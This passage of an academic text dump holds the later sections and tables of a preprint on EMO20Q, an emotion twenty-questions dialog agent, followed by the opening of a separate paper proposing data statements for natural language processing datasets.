the feasibility of the agent design but did not use training beyond the original human-human data.340 The second experiment was a larger experiment that forms the key experimental contribution reported by this paper. It followed the same methodology as the pilot study, but with 101 subjects recruited from Amazon Mechanical Turk. These subjects were selected to come from the United States, speak English fluently, and have high past acceptance rates as Mechanical Turkers. In the second experiment, the parameters of the model were updated every ten subjects. Thus, there345 were ten waves of ten subjects, each playing 3 matches against the automated agent, which yielded 300 matches. After each ten subjects, the model described in Section 3 was updated based on the total counts of the corpus to that point. In addition to updating the probabilities of the models semantic knowledge (likelihoods), new vocabulary items were added if encountered. 5. Results350 The results of our pilot experiments on fifteen subjects are summarized in Table 5. To compare the agent’s performance with human performance, we used two objective measures and one subjective measure. The success rate, shown in column two of Table 5, is an objective measure of how often the EMO20Q matches ended with the agent successfully guessing the user’s emotion. The number of turns it took for the agent to guess the emotion is the other objective measure. The last column, naturalness, is a subjective measure355 where users rated how human-like the agent was, on a 0-10 scale. In the pilot study, the agent obtained a performance of 44% successful outcomes (where the emotion word was correctly guessed). This performance was much less than in the human-human experiments, where successful outcomes occurred in 85% of EMO20Q matches. However, the results indicated that this performance was due to sparcity of data. The emotion words chosen by the subjects as “easy” were recognized360 by the agent with similar success rate and number of required turns as human-human matches. Some examples of “easy” emotions are anger, happiness, and sadness. However, successful outcomes were fewer in emotions chosen as “medium” and “difficult”. Some examples of “medium” emotions are contentment, curiosity, love, and tiredness. Pride, frustration, vindication, and zealousness are examples of “difficult” emotions. Overall, 28 new emotion words were encountered in the pilot study.365 The results in terms of successful outcomes and number of turns required to guess the emotion word are roughly reflected in the percent of words that are in-vocabulary. Despite the low performance on emotion words rated “medium” and “difficult”, there was not a corresponding decrease in the perceived naturalness of the questioner agent. This led us to believe that the model could reproduce somewhat natural behavior, but that the data we had was insufficient due to the amount of out-of-vocabulary words in the medium and370 difficult classes, which motivated us to perform the second, larger-scale experiment with 100 players from 13 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts 25 50 75 easy medium difficult P e r c e n t S u c c e s s experiment final pilot Success Rate 12 14 16 18 easy medium difficult # T u r n s experiment final pilot Average Number of Turns 60 70 80 90 100 easy medium difficult P e r c e n t In - V o c a b . experiment final pilot In-Vocabulary Rate Figure 2: Results of initial automated agent pilot compared to the final experiment of 300 matches on Mechanical Turk, in which the agent was retrained every 30 matches. Mechanical Turk. In the larger scale Mechanical Turk experiment, we aimed to improve performance by retraining the model after each batch of 10 subjects. This strategy did in fact increase the successful outcome rate and reduced the length of the EMO20Q dialogs (number of questions), as can be seen from comparing Tables 5375 and 6, which are visualized in Figure 2. Across all three difficulty classes, the successful outcome rate improved. The “difficult” class had the largest relative improvement in successful outcomes, increasing from 13% to 25%, and the overall successful outcome increased from 44% to 57%. The lengths of the EMO20Q dialogs decreased most for the medium difficulty class, resulting in an average of 1.6 less turns for this class. Overall, the decrease in dialog length decreased from 15.6 to 14.8 turns.380 One surprising result was that even after collecting data from 300 EMO20Q dialogs (more than doubling the earlier human-human data), the out-of-vocabulary rate stayed nearly the same. We had expected out-of vocabulary-words to become fewer as more data had been seen. However, with each round of the Mechanical Turk experiment, we continued to receive new emotion words rather than converging to a closed vocabulary. For the Mechanical Turk experiment, we did not ask subjects about the perceived naturalness of the agent385 in order to save on time, and hence costs to pay the Turkers, so unfortuntately we cannot say whether the perceived naturalness increased. Of the 101 subjects, only one was rejected, due to misunderstanding the task by choosing the words “easy”, “medium”, and “difficult” instead of emotion words. This level of acceptance, approximately 99% is rather high for Mechanical Turk, showing a high degree of cooperation. Several users commented that we390 could have paid less because the task was fun. A complete listing of the words chosen by the subjects of the experiment is given in Table 7. It can be seen that there are a wide variety of words. A few (those marked by “?”) were questionable in the authors’ intuitions, but otherwise the words showed a high level of understanding and cooperation by the Mechanical Turkers. The three difficulty classes of words were not disjoint: some words like anger, disgust, love, and395 confusion spanned several categories. It can be concluded that these three difficulty levels do not form a 14 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts precise, natural classes of emotion words, but the levels do show a trend toward a smaller basic vocabulary and a wider open vocabulary. The difficulty levels also served as a method to elicit diverse words. The original human-human dialogs identified 71 unique emotion words, after the pilot study there were unique 99 emotion words, and after the large-scale mechanical Turk experiment there were 180 unique emotion words.400 6. Discussion The human-human EMO20Q data abounds in highly nuanced natural language descriptions of emotion. For example, one human-human EMO20Q game ended with a discussion of whether “pride” and “proud” refer to the same emotion: [regarding “proud” vs. “pride”] because my intuition was that they’re different... you know405 pride sometimes has a negative connotation In another human-human EMO20Q dialog, a player had difficulty answering whether “anger” was a negative emotion: [questioner:] so is it a negative emotion? [answerer:] sort of, but it can be righteous410 In one human-computer game, one player differentiated the emotion of loving from the emotion of being loved and another player picked the emotion “maudlin”, which the authors needed to look up in a dictionary. Given the highly nuanced, idiosyncratic descriptions in the human-human data, we were surprized at the amount of successful game outcomes in the human-human EMO20Q games and we were initially unsure whether devising an automated agent would be feasible. Although analyzing this level of detail is beyond the415 scope of many current systems, we saw that it is a task that humans can do with high success rates. In fact the successful outcome rates in the human-human EMO20Q games are comparable to agreement rates on emotional annotations at a much coarser level, such as labeling data with nine basic emotion labels (Busso et al., 2008). The human-computer results showed us that it possible for computer agents to perform well at the420 questioner role of EMO20Q and moreover that the agent can learn new vocabulary items and improve its performance past the human-human bootstrap data. The fully trained agent successfully completed 57% of the EMO20Q games, which is 67% of human-human performance and 30% better than the bootstrapped agent. The agent’s emotion word vocabulary nearly doubled after the mechanical Turk experiment. Normally larger emotion vocabularies results in less agreement in annotation tasks but this showed that in the EMO20Q425 dialog task, vocabulary size is not a weakness but rather a strength. Even when the agent fails to guess the human opponent’s emotion word in the EMO20Q game, the agent’s behavior of searching for knowledge 15 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts makes it appear human-like, which enables the agent maintain user engagement and learn from new, out-of- vocabulary words. The ground truth issue involved in annotating recorded data with descriptive labels is a challenge that430 the Socratic epistemology can shed light on. The traditional annotation task seeks to have human annotators assign one of a number of labels to data. In the case of emotion research, usually the labels are a controlled vocabulary of several emotion descriptors, like “angry”, “happy”, “sad”, “disgusted”, “fearful”, “surprised”, and “neutral”. The problem with this approach is that these labels often do not fit realistic emotional data. Theoretically, our approach addresses the issue of ground truth in the annotation task with the notion of435 epistemology, which frames the issue as justification of belief rather than ground truth. Practically, our approach addresses the issue of non-prototypical emotions by enabling a more nuanced representation where the description is not a small, closed set of alternatives but rather an interactive process of communication over a large, open set of natural language descriptions. Though this more nuanced view brings with it new challenges, we have shown the design of an intelligent dialog agent is a feasible way of dealing with these440 challenges. We plan to further continue this research in several ways. First, we hope to see the effect of modality on how people describe emotions in natural language. The current work was limited to text-based chat, so the paralinguistic data that may help to convey emotional information was minimized. Including audio and video data may allow greater convergence of the players to agree upon the unknown emotion in EMO20Q.445 Another area of future research will be to model the answerer role. The current research focused on the questioner role, but the answerer role will offer additional challenges and insights. In particular, automating the answerer role will require more robust natural language understanding because it will need to process to new, unseen questions from users, whereas the questioner used a fixed set of questions and only had to process answers to yes/no questions. The answerer would also likely require a different model than the450 Socratic, question-asking model presented in this paper. A successful answerer agent would allow a pleasing closed-loop simulation where both roles of EMO20Q are played by computer. There are also further areas to explore for the questioner agent, in particular, the criterion for choosing each question. Finally, we think that this approach can improve emotion annotation and other annotation tasks, such as coding behavioral data for psychological assessment. In these tasks human annotators are aksed to label data using a controlled455 vocabulary of words and agreement is established statistically between isolated annotators. However, we have shown that humans are able to communicate with high accuracy using a large, subjective vocabulary and we feel that allowing natural language descriptions in an interactive, question-asking setting will allow for more accurate and less constrained annotations. 16 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts 7. Conclusion460 The main goals of this paper were to formulate a theoretical and computational model for a subset of human emotional language. We called this model the Socratic epistemology for verbal emotional intelligence because uses question-asking to justify beliefs about emotions in a natural language dialog context. We presented the emotion twenty questions (EMO20Q) game and showed that the level of human performance was high despite not limiting the players to any predefined emotion vocabulary. We also presented an465 automated agent that can play the question-asking role of EMO20Q. This agent uses a sequential Bayesian belief update algorithm to simulate a cognitive processing by which the agent updates its belief state of candidate emotion words over time. This framework was inspired by a method of question-asking that was proposed by the ancient philosopher Socrates and the field of epistemology: [Gorgias:] Just as different drugs draw forth different humors from the body – some putting470 a stop to disease, others to life – so too with words: some cause pain, others joy, some strike fear, some stir the audience to boldness, some benumb and bewitch the soul with evil persuasion” (Gorgias, Encomium of Helen, c.415 B.C.). Socrates: You, Gorgias, like myself, have had great experience of disputations, and you must have observed, I think, that they do not always terminate in mutual edification, or in the475 definition by either party of the subjects which they are discussing;. . . Now if you are one of my sort, I should like to cross-examine you, but if not I will let you alone. And what is my sort? you will ask. I am one of those who are very willing to be refuted if I say anything which is not true, and very willing to refute any one else who says what is not true, and quite as ready to be refuted as to refute. (Plato, Gorgias, 380 B.C.)480 In the first quote above, Gorgias, a Sophist rhetorician, describes the effects of words on a person’s emotions. Gorgias describes emotions by making reference to the theory of physiological humors. Humankind’s con- ception of emotions has changed since the time of the ancients, who believed that emotions were generated from bodily “humors”, which in turn were derived from alchemical elements, but our conception of emotion is still largely expressible through language.485 In the second quote, Socrates (as quoted by Plato) cross-examines Gorgias to determine Gorgias’ beliefs. Socrates applied his method of question-asking to understand beliefs about complex abstract concepts that were disputed in ancient times. Two millenia later we have used a computational implementation of this method to make a dialog agent better understand human beliefs about emotional concepts. We have provided an anonymized version of data we gathered from EMO20Q, source code for the exper-490 iments, demos, and other resources at http://sail.usc.edu/emo20q . 17 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts 8. References Cyril Allauzen and Michael Riley. A pushdown transducer extension for the openfst library. In Proceedings of the Conference on Implementation and Application ofAutomata, 2012.495 Allan D. Baddeley. The episodic buffer: A new component of working memory? Trends in Cognitive Science, 4(11):417–423, 2000. Lisa Feldman Barrett. Are emotions natural kinds? Perspectives on Psychological Science, 1(1):28–58, March 2006. Felix Burkhardt, Christian Becker-Asano, Edmon Begoli, Roddy Cowie, Gerhard Fobe, Patrick Gebhard,500 Abe Kazemzadeh, Igmar Steiner, and Tim Llewellyn. Application of emotionml. In Emotion, Social Signals, Sentiment, and Linked Open Data (ES3LOD) 2014, 2014. Carlos Busso, Murtaza Bulut, Chi-Chun Lee, Abe Kazemzadeh, Emily Mower, Samuel Kim, Jeannette Chang, Sungbok Lee, and Shrikanth Narayanan. IEMOCAP: Interactive emotional dyadic motion capture database. Journal of Language Resources and Evaluation, 42(4):335–359, 2008.505 Valeria Carofiglio, Fiorella de Rosis, and Nicole Novielli. Cognitive Emotion Modeling in Natural Language Communication, pages 23–44. Springer, 2009. Umberto Eco and Thomas A. Sebeok, editors. The Sign of Three: Dupin, Holmes, Peirce. Advances in Semiotics. Indiana University Press, 1988. Brandy N. Frazier, Susan A. Gelman, and Henry M. Wellman. Preschoolers’ search for explanatory infor-510 mation within adult-child conversation. Child Development, 80(6):1592–1611, November/December 2009. Thomas L Griffiths, Charles Kemp, and Joshua B Tenenbaum. Bayesian models of cognition. Cambridge University Press, 2008. Jaakko Hintikka. Socratic Epistemology: Explorations of Knowledge-Seeking by Questioning. Cambridge University Press, 2007.515 Charles F. Hockett and Stuart Altmann. A note on design features, pages 61–72. Indiana University Press, 1968. Jeff Howe. The rise of crowdsourcing. Wired Magazine, 14.06, June 2006. Sep Kamvar and Jonathan Harris. We Feel Fine: An Almanac of Human Emotion. Scribner, 2009. Abe Kazemzadeh. Natural Language Description of Emotion. PhD thesis, University of Southern California,520 2013. 18 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts Abe Kazemzadeh, Panayiotis G. Georgiou, Sungbok Lee, and Shrikanth Narayanan. Emotion twenty ques- tions: Toward a crowd-sourced theory of emotions. In Proceedings of ACII’11, 2011. Abe Kazemzadeh, James Gibson, Juanchen Li, Sungbok Lee, Panayiotis G. Georgiou, and Shrikanth Narayanan. A sequential Bayesian agent for computational ethnography. In Proceedings of Interspeech,525 Portland, OR, October 2012. Brian King. The Conceptual Structure of Emotional Experience in Chinese. PhD thesis, Ohio State Univer- sity, 1989. Rada Mihalcea and Hugo Liu. A corpus-based approach to finding happiness. In AAAI Spring Symposium on Computational Approaches to Weblogs, March 2006. URL http://www.cse.unt.edu/~rada/papers/530 mihalcea.aaaiss06.pdf. Emily Mower, Angeliki Metallinou, Chi-Chun Lee, Abe Kazemzadeh, Carlos Busso, Sungbok Lee, and Shrikanth Narayanan. Interpreting ambiguous emotional expressions. In ACII Special Session: Recognition of Non-Prototypical Emotion from Speech- The Final Frontier?, Amsterdam, Netherlands, 2009. Charles Sanders Peirce. Some consequences of four incapacities. Journal of Speculative Philosophy, 2:140–157,535 1868. URL http://www.iupui.edu/~peirce/writings/v2/w2/w2_22/v2_22.htm. Edmond T. Rolls. What Are Emotions, Why Do We Have Emotions, and What Is Their Computational Basis in the Brain, chapter 5, pages 117–146. Oxford University Press, 2005. Bertrand Russell. On denoting. Mind, 14:479–493, 1905. Marc Schröder, Paolo Baggia, Felix Burkhardt, Catherine Pelachaud, Christian Peter, and Enrico Zovato.540 W3C candidate recommendation: Emotion markup language (EmotionML) 1.0, May 2012. URL http: //www.w3.org/TR/emotionml/. http://www.w3.org/TR/emotionml/. Phillip R. Shaver, Upekkha Murdaya, and R. Chris Fraley. Structure of the Indonesian emotion lexicon. Asian Journal of Social Psychology, 4:201–224, 2001. Mark Steyvers, Thomas L Griffiths, and Simon Dennis. Probabilistic inference in human semantic memory.545 Trends in Cognitive Sciences, 10(7):327–334, 2006. Luis von Ahn and Laura Dabbish. Labeling images with a computer game. In Proceedings of the SIGCHI conference on Human factors in computing systems, 2004. Fei Xu and Joshua B Tenenbaum. Word learning as bayesian inference: Evidence from preschoolers. In Proceedings of the Twenty-Seventh Annual Conference of the Cognitive Science Society, 2005.550 19 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts http://www.cse.unt.edu/~rada/papers/mihalcea.aaaiss06.pdf http://www.cse.unt.edu/~rada/papers/mihalcea.aaaiss06.pdf http://www.cse.unt.edu/~rada/papers/mihalcea.aaaiss06.pdf http://www.iupui.edu/~peirce/writings/v2/w2/w2_22/v2_22.htm http://www.w3.org/TR/emotionml/ http://www.w3.org/TR/emotionml/ http://www.w3.org/TR/emotionml/ Ning Zhong, Jiming Liu, Y.Y. Yao, and S. Ohsuga. Web intelligence. In Computer Software and Applications Conference, 2000. Zoltán Kövecses. Metaphor and Emotion: Language, Culture, and Body in Human Feeling. Cambridge University Press, 2000. 20 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts Table 1: Example dialog from EMO20Q questioner agent where the human interlocutor has chosen “relaxation”. Speaker/Event Utterance/Content Agent Let me know when you are ready... User ok Belief update (Uniform distribution) Agent Is it very intense? User no Belief update relaxation:0.027, hope:0.027, boredom:0.027, ..., anger:0.0024 Agent is it positive? User yes Belief update hope:0.15, relaxation:0.12, cheerfulness:0.091, ... Agent is it an emotion that just pops up spontaneously (vs being triggered by something)? User depends Belief update hope:0.33, relaxation:0.23, cheerfulness:0.15, ... Agent is it caused by something in particular? User well, yes, you do need the right conditions Belief update relaxation:0.50, hope:0.29, cheerfulness:0.097, ... Agent Is it relaxation? User Yes Agent so did I get it right? User Yes, you got it Agent Awesome! Would you like to play again? User No, thanks. Agent Thank you for playing 21 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts Table 2: Emotion words from human-human EMO20Q matches. Matches that terminated with words that the answerers felt to be synonyms are denoted by parentheses. emotions (synonyms) count # correct ... emotions (synonyms) count # correct admiration 1 1 guilt 4 4 adoration 1 0 happiness 1 1 affection (love) 2 2 helplessness 1 1 amusement 1 1 hope (feeling lucky) 3 3 anger 2 1 insecurity (shyness) 1 1 annoyance (irritated) 2 2 jealousy (envy) 3 3 anxiety 3 3 joy 1 0 apathy (uninterested) 1 1 loneliness 1 1 awe 1 0 love 2 2 boredom 2 2 madness (anger) 1 1 bravery 1 1 melancholy 1 1 calm 2 2 pity (sympathy) 1 1 cheerfulness 1 1 pride 2 2 confidence 1 1 proud 1 1 confusion 2 1 regret 2 2 contempt 1 1 relief 5 5 contentment (calm) 2 1 sadness 2 2 depression (misery) 2 2 satisfaction 1 0 devastation 1 0 serenity 1 1 disappointment 1 1 shame 1 1 disgust 2 2 shock 1 1 dread (hopelessness) 1 1 shyness 1 1 eagerness (determination) 1 1 silly 1 1 embarrassment 2 2 soberness 1 0 enthusiasm (eagerness) 3 1 sorrow (sadness) 1 1 envy (jealousy) 3 3 stress 1 1 exasperation 1 1 suffering 1 0 excitement 1 1 surprise 3 3 exhilaration (thrill) 1 1 tense (uncomfortable) 1 0 exhaustion 1 1 terror 1 1 fear (distress,scared) 2 2 thankful 1 0 frustration 2 2 thrill (entrancement) 2 1 fury 1 1 tiredness 2 2 glee 1 0 wariness 1 0 gratefulness 1 1 worry (anxiety, scared) 3 3 grumpiness 1 1 total 110 94 22 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts Table 3: Examples of some of the questions that occurred multiple times (disregarding case and punctuation). question count is it positive? 16 ok is it a positive emotion? 15 is it a positive emotion? 14 is it intense? 13 ok is it positive? 10 is it a strong emotion? 7 is it like sadness? 6 is it sadness? 5 is it pride? 5 is it neutral? 5 is it like anger? 5 is it surprise? 4 is it an emotion that makes you feel good? 4 thrilled? 3 regret? 3 pleased? 3 is it very intense? 3 is it love? 3 is it kinda like anger? 3 is it associated with sadness? 3 ... ... ok is it a negative emotion? 2 ok is it a good emotion? 2 okay is it a strong emotion? 2 is it highly activated? 2 is it directed towards another person? 2 is it directed at another person? 2 is it associated with satisfaction? 2 is it associated with optimism? 2 is it associated with disappointment? 2 is it an emotion that lasts a long time 2 does it vary in intensity? 2 Table 4: Examples of question standardization. Standardized Question Examples cause(emptySet,e) can you feel the emotion without any external events that cause it? is it an emotion that just pops up spontaneously (vs being triggered by something)? cause(otherPerson,e) is it caused by the person that it’s directed at? Do you need someone to pull this emotion out of you or evoke it? if so, who is it? e.valence==negative is it considered a negative thing to feel? 2) so is it a negative emotion? situation(e,birthday) would you feel this if it was your birthday? is it a socially acceptable emotion, say, at a birthday party? e==frustration oh, is it frustrated? frustration? 23 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts Table 5: Experimental results for 15 subject pilot study (45 EMO20Q games). difficulty % success avg. turns % in vocab. naturalness easy 73% 11.4 100% 6.9 medium 46% 17.3 93% 5.5 difficult 13% 18.2 60% 5.8 total 44% 15.6 84% 6.1 Table 6: Experimental results for 100 subject Mechanical Turk study (300 EMO20Q games). difficulty % success avg. turns % in vocab. easy 90% 10.7 100% medium 56% 15.7 91% difficult 25% 18.0 60% total 57% 14.8 83.7% Table 7: Observed emotion words by difficulty. Words that were attested but which did not fit the authors’ broad intuitions are marked with ’ ?’. The same words in multiple categories indicate that different subjects had differing opinions about difficulty. difficulty examples easy happiness, anger, sadness, calm, confusion, love, mad, hate, joy medium anger, confusion, contentment, curiosity, depression, disgust, excitement, fear, hate, irritation, love, melan- choly, sorrow, surprise, tiredness, envy, outrage, elation, suffering, jealousy, nervousness, sympathy, thrill, upset, joy, anxiety, frustration, flustered, enjoyment, exhaustion, fury, bordom, delight, cold, apathy, hos- tility, loved, annoyance, playfulness, downtrodden, stupor, despair, pissed, nostalgia, overjoyed, indifference, courage difficult devastation, disgust, ecstasy, ennui, frustration, guilt, hope, irritation, jealousy, morose, proud, remorse, vin- dication, zealousness, elation, mischievous, usure, angst, patience, despise, inspired, euphoria, exuberance, worrying, melancholy, ambivalence, love, loneliness, exacerbated(?), avarace, stress, envy, disillusionment, maudlin, depression, confusion, maniacal, ambiguity, concern, pleasure, shame, indifference, anger, suicidal, pessimism, annoyance, sense of failure, educated(?), manic, overwhelmed, astounded, discontent, energetic, introspective, appalled, serenity, dissatisfaction, anxiety, lust, conflicted, perplexed, jubilance, disappoint- ment, satisfaction, remorse, embarrassment, downcast, guilty, enamored, alienation, exotic(?), hate, caring, resentment, pity, aversion, quixotic, infuriation 24 PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.1292v1 | CC-BY 4.0 Open Access | rec: 10 Aug 2015, publ: 10 Aug 2015 P re P ri n ts work_3jdx4rpw3ne7pdgamiplej6n4e ---- Data Statements for Natural Language Processing: Toward Mitigating System Bias and Enabling Better Science Emily M. Bender Department of Linguistics University of Washington ebender@uw.edu Batya Friedman The Information School University of Washington batya@uw.edu Abstract In this paper, we propose data statements as a design solution and professional prac- tice for natural language processing technol- ogists, in both research and development — through the adoption and widespread use of data statements, the field can begin to address critical scientific and ethical issues that result from the use of data from cer- tain populations in the development of tech- nology for other populations. We present a form that data statements can take and explore the implications of adopting them as part of regular practice. We argue that data statements will help alleviate issues re- lated to exclusion and bias in language tech- nology; lead to better precision in claims about how NLP research can generalize and thus better engineering results; protect com- panies from public embarrassment; and ul- timately lead to language technology that meets its users in their own preferred lin- guistic style and furthermore does not mis- represent them to others. 1 Introduction As technology enters widespread societal use it is important that we, as technologists, think critically about how the design decisions we make and sys- tems we build impact people — including not only users of the systems but also other people who will be affected by the systems without directly inter- acting with them. For this paper, we focus on nat- ural language processing (NLP) technology. Po- tential adverse impacts include NLP systems that fail to work for specific subpopulations (e.g. chil- dren or speakers of language varieties which are not supported by training or test data) or systems that reify and reinforce biases present in training data (e.g. a resume-review system that ranks fe- male candidates as less qualified for computer pro- gramming jobs because of biases present in train- ing text). There are both scientific and ethical rea- sons to be concerned. Scientifically, there is the issue of generalizability of results; ethically, the potential for significant real-world harms. While there is increasing interest in ethics in NLP,1 there remains the open and urgent question of how we integrate ethical considerations into the everyday practice of our field. This question has no simple answer, but rather will require a constellation of multi-faceted solutions. Toward that end, and drawing on value sen- sitive design (Friedman et al., 2006), this pa- per contributes one new professional practice — called data statements — which we argue will bring about improvements in engineering and sci- entific outcomes while also enabling more ethi- cally responsive NLP technology. A data state- ment is a characterization of a dataset which pro- vides context to allow developers and users to better understand how experimental results might generalize, how software might be appropriately deployed, and what biases might be reflected in systems built on the software. In developing this practice, we draw on analogous practices from the fields of psychology and medicine that re- quire some standardized information about the populations studied (e.g. APA 2009; Moher et al. 2010; Furler et al. 2012; Mbuagbaw et al. 2017). Though the construct of data statements applies more broadly, in this paper we focus specifically on data statements for NLP systems. Data state- ments should be included in most writing on NLP including: papers presenting new datasets, papers reporting experimental work with datasets, and 1This interest has manifested in workshops (Fort et al., 2016; Devillers et al., 2016; Hovy et al., 2017) and papers (Hovy and Spruit, 2016) in NLP, as well as workshops in related fields, notably the FATML series (http://www. fatml.org/) held annually since 2014. http://www.fatml.org/ http://www.fatml.org/ To appear in Transactions of the ACL documentation for NLP systems. Data statements should help us as a field engage with the ethical is- sues of exclusion, overgeneralization, and under- exposure (Hovy and Spruit, 2016). Furthermore, as data statements bring our datasets and their rep- resented populations into better focus, they should also help us as a field deal with scientific issues of generalizability and reproducibility. Adopting this practice will position us to better understand and describe our results and, ultimately, do better and more ethical science and engineering.2 We begin by defining terms (§2), discuss why NLP needs data statements (§3) and relate our pro- posal to current practice (§4). Next is the sub- stance of our contribution: a detailed proposal for data statements for NLP (§5), illustrated with two case studies (§6). In §7 we discuss how data state- ments can mitigate bias and use the technique of ‘value scenarios’ to envision potential effects of their adoption. Finally, we relate data statements to similar emerging proposals (§8), make recom- mendations for how to implement and promote the uptake of data statements (§9), and lay out consid- erations for tech policy (§10). 2 Definitions As this paper is intended for at least two dis- tinct audiences (NLP technologists and tech pol- icymakers), we use this section to briefly define key terms. Dataset, Annotations An (NLP) dataset is a collection of speech or writing possibly combined with annotations.3 Annotations include indica- tions of linguistic structure like part of speech tags or syntactic parse trees, as well as labels classify- ing aspects of what the speakers were attempting to accomplish with their utterances. The latter in- cludes annotations for sentiment (Liu, 2012) and for figurative language or sarcasm (e.g. Riloff et al. 2013; Ptáček et al. 2014). Labels can be naturally occurring, such as star ratings in reviews taken as indications of the overall sentiment of the review (e.g. Pang et al. 2002) or the hashtag #sarcasm 2By arguing here that data statements promote both eth- ical practice and sound science, we do not mean to suggest that these two can be conflated. A system can give accurate responses as measured by some test set (scientific soundness) and yet lead to real-world harms (ethical issues). Accord- ingly, it is up to researchers and research communities to en- gage with both scientific and ethical ideals. 3Multi-modal data sets combine language and video or other additional signals. Here, our focus is on linguistic data. used to identify sarcastic language (e.g. Kreuz and Caucci 2007). Speaker We use the term speaker to refer to the individual who produced some segment of linguis- tic behavior included in the dataset, even if the lin- guistic behavior is originally written. Annotator Annotator refers to people who as- sign annotations to the raw data, including tran- scribers of spoken data. Annotators may be crowdworkers or highly trained researchers, some- times involved in the creation of the annota- tion guidelines. Annotation is often done semi- automatically, with NLP tools being used to create a first pass which is corrected or augmented by hu- man annotators. Curator A third role in dataset creation, less commonly discussed, is the curator. Curators are involved in the selection of which data to in- clude, by selecting individual documents, by cre- ating search terms that generate sets of documents, by selecting speakers to interview and designing interview questions, etc. Stakeholders Stakeholders are people impacted directly or indirectly by a system (Friedman et al., 2006; Czeskis et al., 2010). Direct stakeholders include those who interact with the system, ei- ther by participating in system creation (develop- ers, speakers, annotators and curators) or by using it. Indirect stakeholders do not use the system but are nonetheless impacted by it. For example, peo- ple whose web content is displayed or rendered invisible by search engine algorithms are indirect stakeholders with respect to those systems. Algorithm We use the term algorithm to en- compass both rule-based and machine learning ap- proaches to NLP. Some algorithms (typically rule- based ones) are tightly connected to the datasets they are developed against. Other algorithms can be easily ported to different datasets.4 System We use the term (NLP) system to re- fer to a piece of software that does some kind of natural language processing, typically involv- ing algorithms trained on particular datasets. We use this term to refer to both components focused on specific tasks (e.g. the Stanford parser (Klein and Manning, 2003) trained on the Penn Treebank 4Datasets used during algorithm development can influ- ence design choices in machine learning approaches too: Munro and Manning (2010) found that subword information, not helpful in English SMS classification, is extremely valu- able in Chichewa, a morphologically complex language with high orthographic variability. (Marcus et al., 1993) to do English parsing) and user-facing products such as Amazon’s Alexa or Google Home. Bias We use the term bias to refer to cases where computer systems “systematically and un- fairly discriminate against certain individuals or groups of individuals in favor of others” (Fried- man and Nissenbaum, 1996, 332).5 To be clear: (i) unfair discrimination does not give rise to bias unless it occurs systematically and (ii) systematic discrimination does not give rise to bias unless it results in an unfair outcome. Friedman and Nis- senbaum (1996) show that in some cases, sys- tem bias reflects biases in society; these are pre- existing biases with roots in social institutions, practices and attitudes. In other cases, reasonable, seemingly neutral, technical elements (e.g. the or- der in which an algorithm processes data) can re- sult in bias when used in real world contexts; these technical biases stem from technical constraints and decisions. A third source of bias, emergent bias, occurs when a system designed for one con- text is applied in another, e.g. with a different pop- ulation. 3 Why does NLP need data statements? Recent studies have documented the fact that lim- itations in training data lead to ethically problem- atic limitations in the resulting NLP systems. Sys- tems trained on naturally occurring language data learn the pre-existing biases held by the speakers of that data: Typical vector-space representations of lexical semantics pick up cultural biases about gender (Bolukbasi et al., 2016) and race, ethnic- ity and religion (Speer, 2017). Zhao et al. (2017) show that beyond picking up such biases, machine learning algorithms can amplify them. Further- more, these biases, far from being inert or simply a reflection of the data, can have real-world con- sequences for both direct and indirect stakehold- ers. For example, Speer (2017) found that a sen- timent analysis system rated reviews of Mexican restaurants as more negative than other types of food with similar star ratings, because of associa- tions between the word Mexican and words with negative sentiment in the larger corpus on which 5The machine learning community uses the term bias to refer to constraints on what an algorithm can learn, which may prevent it from picking up patterns in a dataset or lead it to relevant patterns more quickly (see Coppin 2004, Ch. 10). This use of the term does not carry connotations of unfair- ness. the word embeddings were trained. (See also Kir- itchenko and Mohammad 2018.) In these and other ways, pre-existing biases can be trained into NLP systems. There are other studies showing that systems from part of speech taggers (Hovy and Søgaard, 2015; Jørgensen et al., 2015) to speech recognition engines (Tatman, 2017) perform bet- ter for speakers whose demographic characteris- tics better match those represented in the training data. These are examples of emergent bias. Because the linguistic data we use will always include pre-existing biases and because it is not possible to build an NLP system in such a way that it is immune to emergent bias, we must seek additional strategies for mitigating the scientific and ethical shortcomings that follow from imper- fect datasets. We propose here that foregrounding the characteristics of our datasets can help, by al- lowing reasoning about what the likely effects may be and by making it clearer which populations are and are not represented, for both training and test data. For training data, the characteristics of the dataset will affect how the system will work when it is deployed. For test data, the characteristics of the dataset will affect what can be measured about system performance and thus provides important context for scientific claims. 4 Current practice and challenges Typical current practice in academic NLP is to present new datasets with a careful discussion of the annotation process as well as a brief charac- terization of the genre (usually by naming the un- derlying data source) and the language. NLP pa- pers using datasets for training or test data tend to more briefly characterize the annotations and will sometimes leave out mention of genre and even language.6 Initiatives such as the Open Lan- guage Archives Community (OLAC; Bird and Si- mons 2000), the Fostering Language Resources Network 